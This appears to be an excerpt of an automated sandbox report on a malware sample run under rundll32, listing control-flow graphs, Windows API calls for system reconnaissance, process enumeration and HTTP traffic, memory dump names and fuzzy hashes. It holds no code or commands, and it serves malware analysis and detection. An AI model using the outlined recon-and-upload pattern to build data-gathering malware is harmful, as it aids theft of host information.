                                                                                                                                                                                control_flow_graph 222 1e51e964d00-1e51e964daf GetUserNameW GetComputerNameExW 223 1e51e964dc7-1e51e964df1 GetComputerNameExW call 1e51e974ad0 222->223 224 1e51e964db1-1e51e964dc1 call 1e51e96b4c0 222->224 229 1e51e964e58-1e51e964e92 call 1e51e972750 call 1e51e95dfc0 223->229 230 1e51e964df3-1e51e964e1a GetTokenInformation 223->230 224->223 244 1e51e964eaa-1e51e964ed1 GetNativeSystemInfo 229->244 245 1e51e964e94-1e51e964ea5 call 1e51e973de0 229->245 231 1e51e964e1c-1e51e964e28 230->231 232 1e51e964e4e-1e51e964e53 call 1e51e974000 230->232 235 1e51e964e2a-1e51e964e39 call 1e51e973de0 231->235 236 1e51e964e3e-1e51e964e49 call 1e51e973de0 231->236 232->229 235->236 236->232 247 1e51e964ee8-1e51e964eec 244->247 248 1e51e964ed3-1e51e964ee6 244->248 245->244 250 1e51e964f17-1e51e964f2d call 1e51e973de0 247->250 251 1e51e964eee-1e51e964efd 247->251 249 1e51e964f01-1e51e964f15 call 1e51e973de0 248->249 255 1e51e964f32-1e51e964f42 249->255 250->255 251->249 257 1e51e964f89-1e51e964fb9 GetAdaptersInfo 255->257 258 1e51e964f44-1e51e964f84 call 1e51e973b90 call 1e51e973de0 call 1e51e973b90 * 2 255->258 262 1e51e964fbb-1e51e964fdc call 1e51e96b4e0 * 2 257->262 263 1e51e964fdd-1e51e964fe3 257->263 258->257 263->262 266 1e51e964fe5-1e51e964ffd call 1e51e96b4c0 GetAdaptersInfo 263->266 266->262 276 1e51e964fff-1e51e96500c 266->276 277 1e51e965012-1e51e965015 276->277 277->262 278 1e51e965017-1e51e965018 277->278 279 1e51e96501f-1e51e965031 call 1e51e9493e0 278->279 282 1e51e965045-1e51e96504c 279->282 283 1e51e965033-1e51e965043 call 1e51e973de0 279->283 282->262 285 1e51e965052-1e51e965062 call 1e51e973de0 282->285 283->279 285->277
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1596153048-0
                                                                                                                                                                                • Opcode ID: 613b39a42297096076d8df795ecebdf88fcc7f73198a8b8cc617fc677116e015
                                                                                                                                                                                • Instruction ID: f0f7a1b9cdf4e63002671977db1a6a06ececace6539270703adbc049ed6c85ec
                                                                                                                                                                                • Opcode Fuzzy Hash: 613b39a42297096076d8df795ecebdf88fcc7f73198a8b8cc617fc677116e015
                                                                                                                                                                                • Instruction Fuzzy Hash: 40A19F30218F888BEB54EB54D8567DEB7E6FB99304F40452AB84AC3291DF78D945CB83
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000003.1940839234.00007DF4D5F10000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4D5F10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_3_7df4d5f10000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateSnapshotToolhelp32
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 3332741929-2766056989
                                                                                                                                                                                • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                • Instruction ID: 3a2f94a4c9d1a3d18595ce1a8a413362906430b4d29aeac94dc46f2084d0502f
                                                                                                                                                                                • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                • Instruction Fuzzy Hash: 1071C03161494C8FEF94EF5CC858BA977E5FBA8315F10462AE81EC72A0EF749954CB80

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExitThreadUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3424019298-0
                                                                                                                                                                                • Opcode ID: e75aec3f6953e41e68741c2dc53a77bf76e5a07dc3bcd17ab7dcc765f8397e6e
                                                                                                                                                                                • Instruction ID: 98b09615b8275b88e7d16f536efcebcd8bd12c7e49d0a1b5dfb131734552bc9a
                                                                                                                                                                                • Opcode Fuzzy Hash: e75aec3f6953e41e68741c2dc53a77bf76e5a07dc3bcd17ab7dcc765f8397e6e
                                                                                                                                                                                • Instruction Fuzzy Hash: E451B3B4218A484FF758EF28D8557F977E2FB56315F100259E49AC32A2DE28E802CB45

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProcedure
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3653107232-0
                                                                                                                                                                                • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                                                • Instruction ID: d473548a6d94ef7b3078510cb8e07544c3b8e903b97a2e3c09e82a96982aee10
                                                                                                                                                                                • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                                                • Instruction Fuzzy Hash: F431B771518B884FE768AF08DC467FEB7E1FB85315F50061EE986C3251EA30A84697C7

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 835 1e51e9417b0-1e51e9417f1 836 1e51e9417f5-1e51e941800 835->836 837 1e51e94184b-1e51e941879 call 1e51e971270 call 1e51e96b4c0 * 2 836->837 838 1e51e941802-1e51e94180d 836->838 837->838 851 1e51e94187b-1e51e94187e 837->851 838->836 839 1e51e94180f-1e51e941846 call 1e51e96b4e0 * 2 838->839 850 1e51e941b05-1e51e941b09 839->850 852 1e51e941b0b-1e51e941b0e call 1e51e96b4e0 850->852 853 1e51e941b13-1e51e941b29 850->853 851->838 854 1e51e941880-1e51e94189f 851->854 852->853 858 1e51e941b2b-1e51e941b4a call 1e51e973b80 call 1e51e94a050 call 1e51e96b4e0 853->858 859 1e51e941b4f-1e51e941b5f 853->859 857 1e51e9418a1-1e51e9418a3 854->857 860 1e51e9418a5-1e51e9418b9 857->860 861 1e51e9418e4-1e51e9418f1 call 1e51e971270 857->861 858->859 859->850 871 1e51e941b61-1e51e941b71 859->871 860->857 863 1e51e9418bb-1e51e9418be 860->863 861->838 872 1e51e9418f7-1e51e94191c 861->872 866 1e51e9418c0-1e51e9418c5 863->866 866->861 870 1e51e9418c7-1e51e9418e2 866->870 870->866 874 1e51e941920-1e51e941935 call 1e51e94a130 872->874 878 1e51e94193b-1e51e941940 874->878 879 1e51e941aec-1e51e941afa 874->879 880 1e51e941a3c-1e51e941a88 call 1e51e974070 call 1e51e944cd0 878->880 881 1e51e941946-1e51e941955 878->881 879->874 882 1e51e941b00 879->882 880->879 893 1e51e941a8a-1e51e941a9e 880->893 883 1e51e941957 881->883 884 1e51e94195d-1e51e94196d 881->884 882->838 883->884 889 1e51e941973-1e51e941976 884->889 891 1e51e941988-1e51e941a17 call 1e51e974070 call 1e51e974000 889->891 892 1e51e941978-1e51e941986 889->892 910 1e51e941a1c-1e51e941a37 891->910 892->889 892->891 897 1e51e941ab0-1e51e941ac5 893->897 898 1e51e941aa0-1e51e941aa7 call 1e51e974000 893->898 897->893 904 1e51e941ac7-1e51e941ae4 call 1e51e974000 * 2 897->904 901 1e51e941aac-1e51e941aae 898->901 901->879 904->879 910->879
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b831061e321d0f0397e512eda674e441edaf112183532585def305e7dd2623be
                                                                                                                                                                                • Instruction ID: dc16083402275e94e900eaf89cfea7b0b2a08e766476a23663b325759ed5ee21
                                                                                                                                                                                • Opcode Fuzzy Hash: b831061e321d0f0397e512eda674e441edaf112183532585def305e7dd2623be
                                                                                                                                                                                • Instruction Fuzzy Hash: 99C1E470218E898FEB55EF69D8947EDB7E2FB59304F500169E88AC32A2DF74D841CB41

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 70f32895c8a6bd777c863f07bcc471f4aa86192ec6dfca8913c26ec2998f9c07
                                                                                                                                                                                • Instruction ID: 99f1a8f2e83e44c9d35eb0d1aa74c10f4e66be7432fd1bb20f959049d0115ece
                                                                                                                                                                                • Opcode Fuzzy Hash: 70f32895c8a6bd777c863f07bcc471f4aa86192ec6dfca8913c26ec2998f9c07
                                                                                                                                                                                • Instruction Fuzzy Hash: 52417470524A488FF358EF28D8557EAB7E2FB48318F50466DF45AC32D6CB788845CB81

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                                                                                                                                • Instruction ID: c99d4731bdaca3437af54528264ce9fc41e82ee2ec69d47906148eed247275cc
                                                                                                                                                                                • Opcode Fuzzy Hash: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                                                                                                                                • Instruction Fuzzy Hash: 10412FB151CB888FE7749F08E8467EAB7E0F799720F00451FE5C982251DA35A4458BC2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
                                                                                                                                                                                • Instruction ID: 4d9acc89ce0bcc16ba67dc5ff547280dc57120d1bf809349661c3a46da48c4f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
                                                                                                                                                                                • Instruction Fuzzy Hash: 3311607061DB889FF754EB18D8467EAB7E1FB98765F00491FF889C2250DA7598808B83
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
                                                                                                                                                                                • Instruction ID: 5bfa084e1d58cc56b1f8234b5d29ecb1e4a64316a12be00c39afe745a82e61dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
                                                                                                                                                                                • Instruction Fuzzy Hash: D311C470A5CF898FEB54EF48D8477E9B3D4F788319F44041EE849C2291DB7598808B83
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
                                                                                                                                                                                • Instruction ID: 3096e0c6038bb8ec2cdef776645efde9839928a5a484b2bb95d84503b4a36924
                                                                                                                                                                                • Opcode Fuzzy Hash: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
                                                                                                                                                                                • Instruction Fuzzy Hash: FE11C170128F886BF7649B18D8463FE72CAFB88318F50051EFD89822C1DFB5564AA743
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
                                                                                                                                                                                • Instruction ID: d37ea3775f7de7b88219ae913e04c1d55a3e00b107ebc270e2f6537cfed42edf
                                                                                                                                                                                • Opcode Fuzzy Hash: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
                                                                                                                                                                                • Instruction Fuzzy Hash: 3311917061CF898FEB58AF08D846BEA77E1F748715F40081EF849C2290DA75A8808A83
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
                                                                                                                                                                                • Instruction ID: 33e4fb906c8622297891d4f5a07ed8386defc6ff8a25a646c87d4f2cf0399695
                                                                                                                                                                                • Opcode Fuzzy Hash: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
                                                                                                                                                                                • Instruction Fuzzy Hash: EA018430A28F898FE748BB18D4077FA77E2F789714F10451EF849C3691DA35D9408A83
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000003.1718143395.000001E51CC60000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51CC60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_3_1e51cc60000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                                                                                                                                • Instruction ID: 29b90d9f92ff412221afcef0c3733f4846ac4b3e9f2fe7d02f58374eddcb8bee
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                                                                                                                                • Instruction Fuzzy Hash: 21F08170618B408BE7589F1884C967977E1FB98759F24452EE99987361CB319842CA43
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000003.1718143395.000001E51CC60000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51CC60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_3_1e51cc60000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                                                                                                                                • Instruction ID: d748822ecbe9c77a31a004b5a41282b281d162263afc505e1ec3209f800ce1a9
                                                                                                                                                                                • Opcode Fuzzy Hash: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                                                                                                                                • Instruction Fuzzy Hash: 18F0B470A24F444BC708AF2C884A67933E2F7A8709F54052EA948D7361DB35E8428B43
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                                                • Instruction ID: f68604382deac3a739683e6e109f0d3f4cd38f86809ff7d8acdc3dcb456e7993
                                                                                                                                                                                • Opcode Fuzzy Hash: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                                                • Instruction Fuzzy Hash: CED0A77248DB5C4DE7609BD8F4433E8B3D0F780328F40442EC18CC1043D63E40464706

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$char_traits$FileModuleNameProcessorVirtual$Concurrency::FolderListPathRootRoot::SafeSpecialctypeshared_ptrstd::ios_base::getlocstd::ios_base::width
                                                                                                                                                                                • String ID: DLLMain$\NTUSER.DAT.Not
                                                                                                                                                                                • API String ID: 3304544195-2041910327
                                                                                                                                                                                • Opcode ID: d30e8e5b88aad5fa04ee92c3bd5113da6591793adca71e7613593e8e8900fb11
                                                                                                                                                                                • Instruction ID: b8d00ccbb3b7a226b3b3ea8b105e7f379e99367cf8a44f082f0d5e2204c0d715
                                                                                                                                                                                • Opcode Fuzzy Hash: d30e8e5b88aad5fa04ee92c3bd5113da6591793adca71e7613593e8e8900fb11
                                                                                                                                                                                • Instruction Fuzzy Hash: 86911072219EC595EB21DB24F4943DE63A3F7C4788F804112DA9D87AABEF39C548CB40

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 149 1e51e947830-1e51e947883 150 1e51e94788a-1e51e947892 InternetOpenW 149->150 151 1e51e947885-1e51e947888 149->151 152 1e51e947af9-1e51e947afd 150->152 153 1e51e947898-1e51e9478d7 InternetConnectW 150->153 151->150 155 1e51e947aff-1e51e947b0c 152->155 153->152 154 1e51e9478dd-1e51e94792b HttpOpenRequestW 153->154 154->155 158 1e51e947931-1e51e94793b 154->158 156 1e51e947b17-1e51e947b1a 155->156 157 1e51e947b0e-1e51e947b11 InternetCloseHandle 155->157 159 1e51e947b1c-1e51e947b1d 156->159 160 1e51e947b25-1e51e947b28 156->160 157->156 161 1e51e94793d-1e51e947945 158->161 162 1e51e947990-1e51e9479ab 158->162 159->160 164 1e51e947b2a-1e51e947b2b 160->164 165 1e51e947b33-1e51e947b3b 160->165 161->162 163 1e51e947947-1e51e94798b call 1e51e972750 * 2 161->163 162->155 173 1e51e9479b1-1e51e9479ba 162->173 163->162 164->165 167 1e51e947b41-1e51e947b4b 165->167 168 1e51e947bd0-1e51e947be3 165->168 171 1e51e947b62-1e51e947b73 167->171 172 1e51e947b4d-1e51e947b54 call 1e51e971230 167->172 174 1e51e947b7a-1e51e947b8a call 1e51e94cb60 171->174 175 1e51e947b75-1e51e947b78 171->175 172->171 187 1e51e947b56-1e51e947b60 call 1e51e96b4e0 172->187 176 1e51e9479bc-1e51e9479de call 1e51e971270 HttpSendRequestA 173->176 177 1e51e9479e6-1e51e947a0a 173->177 189 1e51e947bba-1e51e947bce call 1e51e971410 174->189 190 1e51e947b8c-1e51e947bb8 call 1e51e94a050 call 1e51e96b4e0 174->190 175->168 175->174 176->155 188 1e51e9479e4-1e51e947a16 176->188 191 1e51e947a0c 177->191 187->168 199 1e51e947a18-1e51e947a1f call 1e51e96b4e0 188->199 200 1e51e947a24-1e51e947a3b call 1e51e96b4c0 188->200 189->168 189->187 190->168 191->176 199->200 207 1e51e947a3f-1e51e947a5b InternetQueryDataAvailable 200->207 208 1e51e947a61-1e51e947a69 207->208 209 1e51e947ae3-1e51e947af7 call 1e51e96b4e0 207->209 208->209 210 1e51e947a6b-1e51e947a7e 208->210 209->157 210->209 214 1e51e947a80-1e51e947a86 210->214 214->209 215 1e51e947a88-1e51e947a96 214->215 216 1e51e947aac-1e51e947aaf call 1e51e96b4c0 215->216 217 1e51e947a98-1e51e947aaa RtlReAllocateHeap 215->217 218 1e51e947ab4-1e51e947ade call 1e51e9644a0 216->218 217->218 218->207
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Internet$HeapHttpOpenRequest$AllocateAvailableCloseConnectDataFreeHandleQuerySend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3737532752-0
                                                                                                                                                                                • Opcode ID: bbb038b860022ece9c615c8651eb51f5b0c4a447bc3b9e1814cb5cd5c2ae45f2
                                                                                                                                                                                • Instruction ID: 0f7edb9d343335f38f5fc27832aee697d6764d1aaf214d2ee2afc94abb0e4357
                                                                                                                                                                                • Opcode Fuzzy Hash: bbb038b860022ece9c615c8651eb51f5b0c4a447bc3b9e1814cb5cd5c2ae45f2
                                                                                                                                                                                • Instruction Fuzzy Hash: 99B19030228E888FE764EF18D8557AEB7D6FB98348F144569BC4AC3291EF74DC419782

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4143819432.00007FFDF9111000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDF9110000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4143769575.00007FFDF9110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.4143967323.00007FFDF91DC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.4144009305.00007FFDF91DD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.4144639578.00007FFDFA21F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.4144681045.00007FFDFA224000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.4144712257.00007FFDFA225000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.4144754968.00007FFDFA228000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffdf9110000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocNumaVirtual
                                                                                                                                                                                • String ID: +=$,=$@
                                                                                                                                                                                • API String ID: 4233825816-2127940403
                                                                                                                                                                                • Opcode ID: 90f39fe90f72f0608001160906d043fdca6e6bb2d5c2e1c5a3b78c0ae946c4bd
                                                                                                                                                                                • Instruction ID: 3d20cb168d9bb8a8bc32611a3db64a4a6891b37882464dacde57f21ac9ee91c6
                                                                                                                                                                                • Opcode Fuzzy Hash: 90f39fe90f72f0608001160906d043fdca6e6bb2d5c2e1c5a3b78c0ae946c4bd
                                                                                                                                                                                • Instruction Fuzzy Hash: A5116FA1F1839801FFE88675E93037D6646A716FF4EC043349D2D07BCED96C01058341
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000003.1940839234.00007DF4D5F10000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4D5F10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_3_7df4d5f10000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1083639309-0
                                                                                                                                                                                • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                • Instruction ID: c91aa88037624f2eab42cf60fc06ad22c0a0f3c5aa18941e972b9b718b9f2872
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                • Instruction Fuzzy Hash: B121CD3061494C8FEBE5EB6CCC58BEA33E5FB98311F404227D41EDB290EE759A448750

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 298 1e51ade4af0-1e51ade4b52 VirtualAllocExNuma 299 1e51ade4b61-1e51ade4b6a 298->299 300 1e51ade4b93-1e51ade4b9b 299->300 301 1e51ade4b6c-1e51ade4b91 299->301 301->299
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocNumaVirtual
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 4233825816-2766056989
                                                                                                                                                                                • Opcode ID: 3ad4501b3b3753825116e2f3eb18c4c8e9e85a26242c0a199b5a9ca851232d8f
                                                                                                                                                                                • Instruction ID: a73b0bd6bea40a769753366a19eb866a47f0b13406a0adbee8ccdd71dd8de0cc
                                                                                                                                                                                • Opcode Fuzzy Hash: 3ad4501b3b3753825116e2f3eb18c4c8e9e85a26242c0a199b5a9ca851232d8f
                                                                                                                                                                                • Instruction Fuzzy Hash: E6113072219E8086D751CB19F89471EBBA1F789BA8F101214FB9F87B99DB3DC4548B00

